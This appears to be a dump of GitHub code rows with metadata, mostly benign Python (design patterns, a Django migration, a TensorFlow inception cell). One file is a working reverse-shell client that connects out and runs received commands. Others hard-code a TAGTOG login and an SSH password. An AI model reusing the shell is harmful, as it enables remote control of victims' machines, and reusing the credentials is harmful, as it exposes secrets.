blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
368ee4c27d66b11e3b186093eb0bda683464e2e0 | 23ed2df78ede14883d35b19844790a78db5405ca | /python/python-design-patterns/abstract_factory.py | 29067ce73dfb54a13e56147fe6f77d7f2f155684 | [] | no_license | sosflyyi/source | 703b7128a962f0a257beb59b421ddf0077b878c5 | e0734786e1af76785a379f7bb752efb5de194b35 | refs/heads/master | 2023-04-08T13:10:43.356801 | 2017-06-07T07:13:08 | 2017-06-07T07:13:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,879 | py | #!/usr/bin/env python
# coding=utf-8
# http://ginstrom.com/scribbles/2007/10/08/design-patterns-python-style/
"""
This pattern is a lot simpler to implement than the GoF example, because there's no need to inherit just to satisfy types. In the example below, the PetShop class has an abstract factory as a member (pet_factory). We can configure it at runtime with the desired concrete factory. The pet shop will then generate the appropriate pet type depending on its factory.
"""
#抽象工厂模式 abstract_factory
"""Implementation of the abstract factory pattern"""
import random
class PetShop:
    """A pet shop whose pet creation is delegated to a pluggable factory."""

    def __init__(self, animal_factory=None):
        """Store the concrete factory; it can be swapped at any time."""
        self.pet_factory = animal_factory

    def show_pet(self):
        """Ask the current factory for a pet and describe it on stdout."""
        animal = self.pet_factory.get_pet()
        print("This is a lovely", animal)
        print("It says", animal.speak())
        print("It eats", self.pet_factory.get_food())
# Stuff that our factory makes
class Dog:
    """Product of DogFactory."""

    def speak(self):
        """Return the noise a dog makes."""
        return "woof"

    def __str__(self):
        return "Dog"
class Cat:
    """Product of CatFactory."""

    def speak(self):
        """Return the noise a cat makes."""
        return "meow"

    def __str__(self):
        return "Cat"
# Factory classes
class DogFactory:
    """Concrete factory producing dogs and dog supplies."""

    def get_pet(self):
        """Build and return a new Dog."""
        return Dog()

    def get_food(self):
        """Return the name of the matching food."""
        return "dog food"
class CatFactory:
    """Concrete factory producing cats and cat supplies."""

    def get_pet(self):
        """Build and return a new Cat."""
        return Cat()

    def get_food(self):
        """Return the name of the matching food."""
        return "cat food"
# Create the proper family
def get_factory():
    """Pick one of the concrete factory classes at random and instantiate it."""
    factory_cls = random.choice([DogFactory, CatFactory])
    return factory_cls()
# Show pets with various factories
if __name__ == "__main__":
    # Demonstrate runtime reconfiguration: the same shop serves different
    # pets as its abstract factory member is swapped before each showing.
    shop = PetShop()
    for i in range(3):
        shop.pet_factory = get_factory()
        shop.show_pet()
        print("=" * 20)
| [
"chenzhongtao@126.com"
] | chenzhongtao@126.com |
8eea73a4817b583b59e9ae72e614c0630731fafb | dcddc234eea906c63553f6495e182e44f3e8431d | /forum/migrations/0001_initial.py | 5ec4c7773023cc10c07b7d6d003e4cc6ea318831 | [
"MIT"
] | permissive | Kromey/akwriters | 53e648e1cc4c0970c843c9b426d0e7de21c9eabb | 72812b5f7dca3ad21e6e9d082298872b7fa607b9 | refs/heads/master | 2022-03-08T00:57:42.232126 | 2021-07-21T15:23:33 | 2021-07-21T15:23:33 | 28,463,802 | 0 | 0 | MIT | 2022-02-10T08:06:49 | 2014-12-24T22:41:56 | JavaScript | UTF-8 | Python | false | false | 2,238 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-01-20 01:11
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the forum app: Board, Topic, and Post.

    Auto-generated by Django 1.10.2 -- avoid hand-editing once applied.
    """

    initial = True

    dependencies = [
        # Post.user references the (swappable) auth user model.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Board',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=25)),
                ('slug', models.SlugField(blank=True, max_length=25)),
                ('description', models.CharField(max_length=255)),
                # Boards nest beneath an optional parent board (self FK).
                ('parent', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='forum.Board')),
            ],
        ),
        migrations.CreateModel(
            name='Post',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('subject', models.CharField(max_length=128)),
                ('body', models.TextField()),
                # left/right look like nested-set tree bounds for threaded
                # ordering -- TODO confirm against the Post model.
                ('left', models.PositiveIntegerField(default=0)),
                ('right', models.PositiveIntegerField(default=0)),
            ],
            options={
                'ordering': ('left',),
            },
        ),
        migrations.CreateModel(
            name='Topic',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('board', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='forum.Board')),
            ],
        ),
        migrations.AddField(
            model_name='post',
            name='topic',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='forum.Topic'),
        ),
        migrations.AddField(
            model_name='post',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
    ]
| [
"travisvz@gmail.com"
] | travisvz@gmail.com |
233b661904e8d0b44aedd76dc4b3433a2a440670 | 35a1fc9f67def5866673369eb9d68f11e8f2a4c9 | /Reverse-Shell/cliente-victima.py | bf73693d9f0047b68b616c3a35d183aa7f0ad931 | [] | no_license | Suz4nGG/ShellCodes | fe62a5dbee865d931622f716a58b3ed057c82d33 | 93d8a3d129939053583071ac88012b90ef9ecdc4 | refs/heads/master | 2023-06-06T09:34:17.698061 | 2021-06-25T04:44:48 | 2021-06-25T04:44:48 | 380,128,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,975 | py | import socket
import sys
import subprocess
import threading
import os
# Global connection settings for the reverse-shell client.
host = 'terminal'
puerto = 8000
FIN_COMANDO = b'#00#'  # sentinel marking the end of a message on the wire
def mandar_comando(comando, socket):
    """Send a command over the socket, terminated by FIN_COMANDO.

    `comando` may be str (encoded as UTF-8) or bytes.  Note: contrary to
    the old docstring, this function does NOT wait for a reply; callers
    read the server response themselves.
    """
    if isinstance(comando, str):
        # BUG FIX: the wire protocol is bytes; appending the bytes
        # sentinel to a str raised TypeError on Python 3.
        comando = comando.encode('utf-8')
    socket.send(comando + FIN_COMANDO)
def ejecutar_comando(comando):
    """Run a shell command and return its binary stdout.

    `comando` arrives as a bytes string and is decoded before execution.
    Returns False when the command wrote anything to stderr.
    """
    texto = comando.decode('utf-8')
    proceso = subprocess.Popen(
        texto,
        shell=True,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
    )
    stdout_bin, stderr_bin = proceso.communicate()
    return False if stderr_bin else stdout_bin
def leer_comando(cliente):
    """Read from the client socket until FIN_COMANDO arrives.

    Returns the reassembled command with the sentinel stripped.
    """
    print('Reading commands..................')
    datos = cliente.recv(2048)
    while not datos.endswith(FIN_COMANDO):
        datos += cliente.recv(2048)
    # Strip the trailing sentinel before handing the command back.
    return datos[:-len(FIN_COMANDO)]
def atender_servidor(cliente):
    """Main command loop: read commands from the server socket, run them
    locally, and send the output back, until b'exit' is received.

    NOTE(review): the initial str '' never equals b'exit', so the loop
    always runs at least once; also startswith(b'cd') matches any command
    beginning with 'cd' (e.g. 'cdrecord') -- confirm intended.
    """
    comando = ''
    while comando != b'exit':
        comando = leer_comando(cliente)
        if comando.startswith(b'cd'):
            # 'cd' must be handled in-process: a subshell's cwd change
            # would not persist.
            ruta = extraer_ruta_cd(comando)
            if ruta == False:
                salida = False
            else:
                salida = ejecutar_cd(ruta)
        else:
            salida = ejecutar_comando(comando)
        #print(salida)
        if salida == False:
            mandar_mensaje(b'command not found', cliente)
        else:
            mandar_mensaje(salida, cliente)
    cliente.close()
def ejecutar_cd(ruta):
    """Change the process working directory.

    Returns b'' on success (empty output) or False when the path is missing.
    """
    try:
        os.chdir(ruta)
    except FileNotFoundError:
        return False
    return b''
# * Extraer ruta del cd
def extraer_ruta_cd(comando):
    """Parse a b'cd <ruta>' command; return the path, or False if malformed."""
    trozos = comando.split(b' ')
    # Anything other than exactly "cd <one path>" is treated as an error.
    return trozos[1] if len(trozos) == 2 else False
def mandar_mensaje(mensaje, socket):
    """Send a binary message over the socket, terminated by FIN_COMANDO.

    `mensaje` must already be a bytes string.
    """
    socket.send(mensaje + FIN_COMANDO)
def inicializar_conexion(host, puerto):
    """Open a TCP connection to (host, puerto) and return the socket.

    Prints a message and exits the process with status 1 when the
    connection cannot be established.
    """
    cliente = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        cliente.connect((host, int(puerto)))
    except OSError:
        # BUG FIX: the original wrapped connect() in `while True`, so the
        # unconditional `return` was unreachable -- after a successful
        # connect the loop re-connected, raised, and exited.  Also narrow
        # the bare `except:` to OSError (refused/unreachable/bad address).
        print('Se rechazo la conexion')
        exit(1)
    return cliente
if __name__ == '__main__':
    # Entry point: connect back to the operator and serve commands.
    var = "hola"
    socket = inicializar_conexion(host, puerto)
    # NOTE(review): `socket` now shadows the imported socket module.
    # Run the command loop in a thread so the console stays open.
    shell = threading.Thread(target=atender_servidor, args=(socket, ))
    shell.start()
    print(var)
"scxg240@gmail.com"
] | scxg240@gmail.com |
a361d35907779685397f0f0a4a923cdf43e26751 | 00ea1f84e959a8707024c61ee0a5d7a7c07dda31 | /src/events.py | 0aeeb3b4b3af94e49ff83229df7338f4cd815de6 | [] | no_license | kameko/server.py | b02b8cbaeb4c6bdcf3322582cdc662684a21ab25 | 89af5e9bd423f9a341cd6d30257a695df1763b13 | refs/heads/master | 2022-08-02T18:28:46.336419 | 2020-05-21T20:30:46 | 2020-05-21T20:30:46 | 264,576,817 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,391 | py |
from typing import Callable
import discord
class Events:
    """Synchronous publish/subscribe hub for system and Discord events."""

    def __init__(self):
        # One subscriber list per event type.
        self.system_shutdown_callbacks = []
        self.discord_message_recieve_callbacks = []
        self.discord_message_updated_callbacks = []

    @staticmethod
    def _fire(handlers, *args):
        # Invoke every registered handler with the given arguments.
        for handler in handlers:
            handler(*args)

    # system
    def on_system_shutdown(self, callback: Callable[[object], None]) -> None:
        """Subscribe to shutdown requests."""
        self.system_shutdown_callbacks.append(callback)

    def request_system_shutdown(self, sender: object) -> None:
        """Notify all shutdown subscribers."""
        self._fire(self.system_shutdown_callbacks, sender)

    # discord
    def on_discord_message_recieve(self, callback: Callable[[object, discord.Message], None]) -> None:
        """Subscribe to newly received Discord messages."""
        self.discord_message_recieve_callbacks.append(callback)

    def request_on_discord_message_recieve(self, sender: object, message: discord.Message) -> None:
        """Notify subscribers of a received message."""
        self._fire(self.discord_message_recieve_callbacks, sender, message)

    def on_discord_message_updated(self, callback: Callable[[object, discord.Message, discord.Message], None]) -> None:
        """Subscribe to edited Discord messages."""
        self.discord_message_updated_callbacks.append(callback)

    def request_on_discord_message_updated(self, sender: object, old_message: discord.Message, new_message: discord.Message) -> None:
        """Notify subscribers of a message edit."""
        self._fire(self.discord_message_updated_callbacks, sender, old_message, new_message)
| [
"kameko.k@outlook.com"
] | kameko.k@outlook.com |
0b66c94d17a782202d69711a2d1968aafc8ee22f | 8f5fd71ad7eebff6d6090f8d368b71efe6e1ceb6 | /auto_project.bak/automation/app_projects/tools/ssh_open.py | e84d2c88bb8ace86e67965bec9f1065189ea0672 | [] | no_license | LDoctor/flask_auto | ed9111f93f479d389591b8b0da1afb72a5032640 | cf7a6f78f5b380f7a4c441c50248f3e3bf9aebe3 | refs/heads/master | 2022-11-05T00:22:33.620902 | 2020-06-19T10:48:56 | 2020-06-19T10:48:56 | 273,470,045 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,168 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 19-5-17 下午5:44
# @Author : nan
# @File : ssh_open.py
import os
import commands
import paramiko
import pexpect
from flask import current_app
from app_projects.tools.file_path import PathDir
def get_cmd(cmd):
    """Run `cmd` through the shell and return its textual output."""
    import subprocess
    # BUG FIX: the `commands` module is Python 2 only, yet this file's
    # shebang is python3.  subprocess.getstatusoutput is the drop-in
    # replacement for commands.getstatusoutput.
    _, output = subprocess.getstatusoutput(cmd)
    return output
def ssh_popen_1(host, cmd, port=22, hostname='root'):
    # Open a key-authenticated SSH session, run one command, and return
    # its stripped stdout text.
    # NOTE(review): `hostname` is actually passed as the USERNAME to
    # paramiko.connect -- the parameter name is misleading.
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(host, port, hostname, key_filename=PathDir.awlcoud_idrsa())
    stdin, stdout, stderr = ssh.exec_command(cmd)
    return stdout.read().decode().strip()
def auto_code(ssh, code_key, _type='p'):
    """
    Answer an interactive SSH/scp prompt and log the outcome.

    :param ssh: pexpect spawn object driving the remote session
    :param code_key: previous expect() result; 1 means a prompt was seen
    :param _type: 'p' -> answer the password prompt / 'y' -> answer "yes"
    :return: None (logs via Flask's current_app logger)
    """
    # SECURITY NOTE(review): the password is hard-coded below; it should
    # come from configuration or a secrets store.
    if code_key == 1:
        if _type == 'p':
            ssh.sendline('udsafe\n')
        elif _type == 'y':
            ssh.sendline('yes\n')
        index = ssh.expect(["#", pexpect.EOF, pexpect.TIMEOUT])
    else:
        index = ssh.expect(["#", pexpect.EOF, pexpect.TIMEOUT])
    if index == 0:
        current_app.logger.info('logging error connect')
    elif index == 1:
        current_app.logger.info("上传3.0项目成功!")
    elif index == 2:
        current_app.logger.info("logging timeout exit")
def y_ssh(cmd):
    """Spawn `cmd` under pexpect, log the session to log.txt, and answer
    a password prompt automatically via auto_code()."""
    # Earlier scp-based invocation, kept for reference:
    # ssh = pexpect.spawn('scp -r {project_path} root@{panacube_ip}:/home/udsafe/'.format(
    #     project_path=project_path,
    #     panacube_ip=get_values('data', 'data').get('panacube').get('panacube_ip')
    #     )
    # )
    ssh = pexpect.spawn(cmd)
    # NOTE(review): log file handle is never closed explicitly.
    ssh.logfile = open('log.txt', 'w')
    # code_key = ssh.expect([pexpect.TIMEOUT,'continue connecting (yes/no)?'], timeout=3)
    code_pw = ssh.expect([pexpect.TIMEOUT, 'password:'], timeout=3)
    auto_code(ssh, code_pw)
    # if index == 0:
    #     current_app.logger.info('上传3.0项目成功')
    # elif index == 1:
    #     current_app.logger.info("logging process exit!")
    # elif index == 2:
    #     current_app.logger.info("logging timeout exit")
if __name__ == '__main__':
    # Smoke test: drive a local `ls` through the expect helper.
    y_ssh('ls')
| [
"liyuhang@udsafe.com.cn"
] | liyuhang@udsafe.com.cn |
6094f82aee034e2c17d3f9619c003e48d77b2144 | cc75b7b27bb2b8b99947be21347e0cf50309ef8c | /credentials.py | e963ca32fc001d2e133d542c5bf42df06fbab9c6 | [] | no_license | the-knightfury/SATP-Event-Classification-V1 | 8d6d779ab9e7577e6691dd9187cc55a7f84a3c63 | 43851d483842dde562614e30c9c48ae4d773138c | refs/heads/master | 2023-01-22T12:53:21.750832 | 2020-12-01T07:00:45 | 2020-12-01T07:00:45 | 298,616,769 | 1 | 2 | null | 2020-09-25T16:40:57 | 2020-09-25T15:51:53 | Python | UTF-8 | Python | false | false | 92 | py | """
This is the credentials of TAGTOG
"""
# SECURITY NOTE(review): credentials are hard-coded and committed to the
# repository; move them to environment variables or a secrets store and rotate.
USERNAME = 'ssp180002'
PASSWORD = '1234567'
"shahreeen@gmail.com"
] | shahreeen@gmail.com |
fe671448d1ff1c4f419072f381f827f8f1e18a76 | 57f50165f8344ba218de0f03a4ed344b1ed33532 | /google_net/google_cell.py | 258473030b04042cbb4f95315478893c32ab7ccc | [] | no_license | Zames-Chang/machine-learning-paper-review | 8308c04b6fbec12494df79197166a2b05ad1fb39 | 5cfaf57bf298b6639afbf878eb7a3de5c1517a0b | refs/heads/master | 2020-04-25T03:32:14.692516 | 2020-03-14T14:20:23 | 2020-03-14T14:20:23 | 172,480,371 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,222 | py | import tensorflow as tf
class google_net_cell(object):
    """One GoogLeNet/Inception block: parallel 1x1, 3x3, 5x5 convolution
    branches plus an average-pooling branch, concatenated channel-wise."""

    def __init__(self, image_width, image_height, channel):
        self.a = 0  # unused; kept for backward compatibility
        self.width = image_width
        self.height = image_height
        self.channel = channel
        # Output filter count for each of the four parallel branches.
        self.filter_number = [channel, channel, channel, channel]

    def get_padding(self, tensor, shape):
        """Zero-pad `tensor` (spatially halved by pooling) back toward the
        original spatial size.  `shape` is [width, height]."""
        width, height = shape
        width2 = width // 2
        height2 = height // 2
        top = (height - height2) // 2
        bottom = height - height2 - top
        left = (width - width2) // 2
        right = width - width2 - left
        paddings = [[top, bottom], [left, right]]
        # BUG FIX: ZeroPadding2D was referenced without ever being
        # imported (NameError at call time); use the tf.keras layer.
        return tf.keras.layers.ZeroPadding2D(paddings)(tensor)

    def conv(self, input_data):
        """Apply the inception block to a flat batch, returning the
        channel-wise concatenation of the four branch outputs."""
        input_layer = tf.reshape(input_data, [-1, self.width, self.height, self.channel])
        # Branch 1: plain 1x1 convolution.
        conv1 = tf.layers.conv2d(
            inputs=input_layer,
            filters=self.filter_number[0],
            kernel_size=[1, 1],
            padding="same",
            activation=tf.nn.relu)
        # Branch 2: 1x1 bottleneck followed by 3x3.
        conv2_1 = tf.layers.conv2d(
            inputs=input_layer,
            filters=self.filter_number[1],
            kernel_size=[1, 1],
            padding="same",
            activation=tf.nn.relu)
        conv2_2 = tf.layers.conv2d(
            inputs=conv2_1,
            filters=self.filter_number[1],
            kernel_size=[3, 3],
            padding="same",
            activation=tf.nn.relu)
        # Branch 3: 1x1 bottleneck followed by 5x5.
        conv3_1 = tf.layers.conv2d(
            inputs=input_layer,
            filters=self.filter_number[2],
            kernel_size=[1, 1],
            padding="same",
            activation=tf.nn.relu)
        conv3_2 = tf.layers.conv2d(
            inputs=conv3_1,
            filters=self.filter_number[2],
            kernel_size=[5, 5],
            padding="same",
            activation=tf.nn.relu)
        # Branch 4: average pooling, re-padded to the input size, then 1x1.
        pool1 = tf.layers.average_pooling2d(inputs=input_layer, pool_size=[3, 3], strides=2)
        padding_pool = self.get_padding(pool1, [self.width, self.height])
        # BUG FIX: conv4 previously read from conv2_1 (duplicating the 3x3
        # branch) and left padding_pool entirely unused.
        conv4 = tf.layers.conv2d(
            inputs=padding_pool,
            filters=self.filter_number[0],
            kernel_size=[1, 1],
            padding="same",
            activation=tf.nn.relu)
        return tf.concat([conv1, conv2_2, conv3_2, conv4], -1)
"z5254215560@gmail.com"
] | z5254215560@gmail.com |
b9bf63097708fa8eec2e1720fbe8ab1c635be2d0 | 3cf00c075549de7b945fbe8795faf20355292838 | /ex3.py | 0680fcaac983d1df0b7f191fc527a951e4710f96 | [] | no_license | alex-mclaughlin/hardway | b29664ee6a553d54be99f50b4e29fa4c614855bd | 9af78009e7f3a108d1aef264c372e40d4f185538 | refs/heads/master | 2021-05-12T16:40:07.898383 | 2018-06-22T05:07:03 | 2018-06-22T05:07:03 | 117,021,485 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 408 | py | print "I will now count my chickens:"
#Im printing the chicken comments
print "Hens", 25.0 + 30 / 6
#I'm doing some addition and division
print "Roosters", 100 - 25 * 3 % 4
#etc etc etc
print "Now I will count the eggs:"
print 3 + 2 + 1 -5 + 4 % 2 - 1 / 4 +6
print "Is it true that 3 + 2 < 5-7?"
print 3+ 2 < 5 - 7
print "Oh, that's why it's False."
print "How about some more."
print "Is it greater?", 5> 2
| [
"amclaughlin@cmginc.com"
] | amclaughlin@cmginc.com |
ee2b1b7770b299963ac3f8b56329e70832f4db25 | 84364a1cc58712df61afd1c82ad45aefc761d25a | /portald/portald/wsgi.py | b020edf6050fdde9b786b982bcc7745c25b48ddd | [] | no_license | dbafurushima/portal-dashboard | 95c479206fee5512c0a661f5e11b9f956bd0346a | 43f2f76a7416bda864276b53d03be48293f1e707 | refs/heads/master | 2023-07-10T07:42:09.986599 | 2021-08-22T13:22:04 | 2021-08-22T13:22:04 | 288,833,570 | 0 | 1 | null | 2021-06-18T16:59:21 | 2020-08-19T20:43:53 | JavaScript | UTF-8 | Python | false | false | 391 | py | """
WSGI config for portald project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings before building the application.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'portald.settings')
# WSGI callable used by application servers (gunicorn, mod_wsgi, ...).
application = get_wsgi_application()
| [
"paulojrbeserra@gmail.com"
] | paulojrbeserra@gmail.com |
b186151473ccd843ebb0867eb5d9584dbb5d852d | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/yosinski_deep-visualization-toolbox/deep-visualization-toolbox-master/misc.py | ed1ee755e93c924c466045c1232ccace4c7d6ee6 | [] | no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 1,272 | py | #! /usr/bin/env python
import os
import time
import errno
class WithTimer:
    # Context manager that times a code block and, unless quiet, prints
    # elapsed wall-clock and CPU time on exit.
    # NOTE(review): time.clock() was removed in Python 3.8 and the print
    # statement below is Python 2 syntax -- this class is py2-only as is.
    def __init__(self, title = '', quiet = False):
        self.title = title
        self.quiet = quiet
    def elapsed(self):
        # Returns (wall_seconds, cpu_seconds) since __enter__.
        return time.time() - self.wall, time.clock() - self.proc
    def enter(self):
        '''Manually trigger enter'''
        self.__enter__()
    def __enter__(self):
        self.proc = time.clock()
        self.wall = time.time()
        return self
    def __exit__(self, *args):
        if not self.quiet:
            titlestr = (' ' + self.title) if self.title else ''
            print 'Elapsed%s: wall: %.06f, sys: %.06f' % ((titlestr,) + self.elapsed())
def mkdir_p(path):
    """Create *path* and any missing parents, like ``mkdir -p``.

    An already-existing directory is not an error; every other OSError
    is re-raised.  (Recipe from stackoverflow.com/questions/600268.)
    """
    try:
        os.makedirs(path)
    except OSError as exc:
        # Only swallow "already exists" when the path really is a directory.
        if exc.errno != errno.EEXIST or not os.path.isdir(path):
            raise
def combine_dicts(dicts_tuple):
    '''Combine multiple dictionaries into one by prefixing each key.

    `dicts_tuple` is an iterable of (prefix, dict) pairs; the result maps
    '<prefix><key>' to the corresponding value.  Later pairs win when a
    prefixed key collides.
    '''
    ret = {}
    for prefix, dictionary in dicts_tuple:
        # Iterate items() instead of keys() + a second lookup per key.
        for key, value in dictionary.items():
            ret['%s%s' % (prefix, key)] = value
    return ret
| [
"659338505@qq.com"
] | 659338505@qq.com |
489ae2de0e81ea2265a337795af2556c86a36edb | f2f9a1ed111ba74e837751cb6b67e9c65cc91831 | /in_consistente.py | 0268e0e8973eb834942d141a135061a8d78fda9d | [] | no_license | matheuscoimbra/aritm-tica_calculo_python | cce94d4fbe9163f78f8b23715898fc52264f38d8 | 2c4b7a885f3fae4c195c9031222e298f13e518e3 | refs/heads/master | 2020-05-19T01:17:24.176893 | 2019-05-03T12:30:19 | 2019-05-03T12:30:19 | 184,751,696 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,430 | py | import numpy as np
import sys
import re
# 5x5 coefficient matrix of the linear system under analysis; the last
# row is deliberately all zeros to exercise the consistency checks below.
A = np.array([[6, 2, 0, 0, 0],
              [-1, 7, 2, 0, 0],
              [0, -2, 8, 2, 0],
              [0, 0, 3, 7, -2],
              [0, 0, 0, 0, 0]], dtype='double')

# Right-hand-side column vector.
b = np.array([[2], [-3], [4], [-3], [0]], dtype='double')
# A = np.array([[1, 1, 1, 1, 1],
# [1, 2, 4, 1, 1],
# [0, 1, 2, 2, 2],
# [1, 2, 1, 3, 1],
# [3, 5, 1, 1, 1]], dtype='double')
#
# b = np.array([[0], [1], [1], [0], [0]], dtype='double')
# A = np.array([[1, 1, 1, 1, 1],
# [1, 2, 4, 1, 1],
# [0, 1, 2, 2, 2],
# [1, 2, 1, 3, 1],
# [0, 0, 0, 0, 0]], dtype='double')
#
# b = np.array([[0], [1], [1], [0], [3]], dtype='double')
# A = np.array([[1, 2, -3],
# [6, 3, -9],
# [7, 14, -21]
# ], dtype='double')
#
# b = np.array([[2], [6], [13]], dtype='double')
# A = np.array([[4, -6, -3],
# [1, 1, -2],
# [4, -20, -4]
# ], dtype='double')
#
# b = np.array([[12], [3], [6]], dtype='double')
# A = np.array([[1, -1, 3],
# [1, 1, 1],
# [2, -1, 5]
# ], dtype='double')
#
# b = np.array([[1], [-3], [0]], dtype='double')
# A = np.array([[3, -2, 3],
# [1, 3, 6],
# [2, 6, 12],
# ], dtype='double')
#
# b = np.array([[8], [-3], [-6]], dtype='double')
# Augmented matrix [A | b].
E = np.append(A, b, axis=1)
# Manual pivot: swap rows 0 and 1 so E[0,0] is a usable pivot.
aux = np.copy(E[1, :])
E[1, :] = np.copy(E[0, :])
E[0, :] = np.copy(aux)
# Gaussian forward elimination: zero out entries below each pivot.
for i in range(1, len(E)):
    for j in range(i, len(E)):
        E[j, :] = E[j, :] - (E[j, i - 1] / E[i - 1, i - 1]) * E[i - 1, :]
print(E)
def det_zero(matrix):
    """Heuristically decide whether det(matrix) must be zero.

    Returns True when the matrix has an all-zero row/column or a pair of
    identical rows/columns, otherwise False.  (Only these sufficient
    conditions are checked, not a full determinant.)
    """
    # An all-zero column or row forces a zero determinant.
    if (~matrix.any(axis=0)).any() or (~matrix.any(axis=1)).any():
        return True
    n = len(matrix)
    for i in range(n - 1):
        col = matrix[:, i]
        lin = matrix[i, :]
        for j in range(i, n - 1):
            # Duplicate columns or rows also force a zero determinant.
            if np.array_equal(matrix[:, j + 1], col) or np.array_equal(matrix[j + 1, :], lin):
                return True
    # BUG FIX: previously fell off the end returning None; be explicit.
    return False
def row_zero(matrix):
    """Return the index of the last all-zero row of `matrix`, or -1 if none.

    BUG FIX: the original returned from inside the loop, so only row 0
    was ever inspected; now every row is checked.
    """
    index = -1
    for i in range(len(matrix)):
        if not matrix[i, :].any():
            index = i
    return index
# Rouche-Capelli analysis: compare rank(A) with rank([A|b]).
Ab = np.append(A, b, axis=1)
rankA = np.linalg.matrix_rank(A)
rankAb = np.linalg.matrix_rank(Ab)
# print("RankA: ",rankA," rankAb: ",rankAb)
m, n = np.shape(A)
col = b.tolist()
X = np.zeros(n)
det = det_zero(A)
# Split the eliminated augmented matrix into coefficients and RHS.
nonB = np.delete(E, m, 1)
# print(nonB)
B = E[:, m]
if m == n:
    # Square system: classify via rank equality and zero rows of E.
    ind = row_zero(nonB)
    if (rankAb == rankA) and ind == -1:
        print("Sistema é consistente e possui uma única solução")
    else:
        if ind != -1:
            if B[ind] != 0.0: # verificar coluna tbm
                # 0 = nonzero: contradictory equation -> inconsistent.
                print("Sistema é inconsistente")
            else:
                # 0 = 0 row: drop it and print a parametrized solution.
                print("Sistema possui infinitas soluções")
                E = np.delete(E, ind, 0)
                # print(E)
                b = E[:, m]
                a = np.delete(E, m, 1)
                tam = len(E)
                l = 0
                strr = ""
                for i in range(tam):
                    ei = a[i] # current row's coefficients
                    eii = a[i][i]
                    rep = 0
                    for k in range(len(ei)):
                        if ei[k] == 0.0 or ei[k] == eii:
                            # Skip the first occurrence of the pivot value.
                            if ei[k] == eii and rep !=1:
                                rep = 1
                                continue
                        strr += "{}x{} ".format(ei[k], k + 1)
                    # Join the collected terms with '+' signs for display.
                    regexp = re.compile(r'\s\d+(\s)?')
                    if regexp.search(strr):
                        # strr = strr.strip()
                        strr = strr.replace(" ", "+")
                        strr = "(" + strr + ")"
                        strr = strr.replace("+)", ")")
                    print("x{} ={} - {}/{}".format(i + 1, b[i], strr, eii))
                    strr = ""
all_zeros = not np.any(b)
if m < n:
    # Fewer equations than unknowns (as classified here).
    print("Sistema é inconsistente")
if m > n:
    if all_zeros == True:
        print("Sistema possui infinitas soluções")
        print("Sol.: ", X)
    if rankA == min(m, n):
        print("Sistema possui infinitas soluções")
| [
"noreply@github.com"
] | noreply@github.com |
06ef710b8f2fdb097d080989059ff6ff1ac7c29a | 821784089626ce4319dd98d8e16ee84b20b7da8e | /klass/urls.py | 372f46d61199432cac3687e6dbc718a15a07a2bd | [] | no_license | sousa-andre/mode | 504da0d49fbf6b5e13bf25702751169a77824a12 | cf2bc412674cf0af66a51c9ee90dcae65e02fe74 | refs/heads/master | 2022-11-18T22:03:22.449730 | 2020-07-20T20:49:26 | 2020-07-20T20:49:26 | 281,217,406 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 984 | py | from django.urls import path
from .views import \
class_detail, ClassSubjectDetail, ClassSubjectFileCreate, \
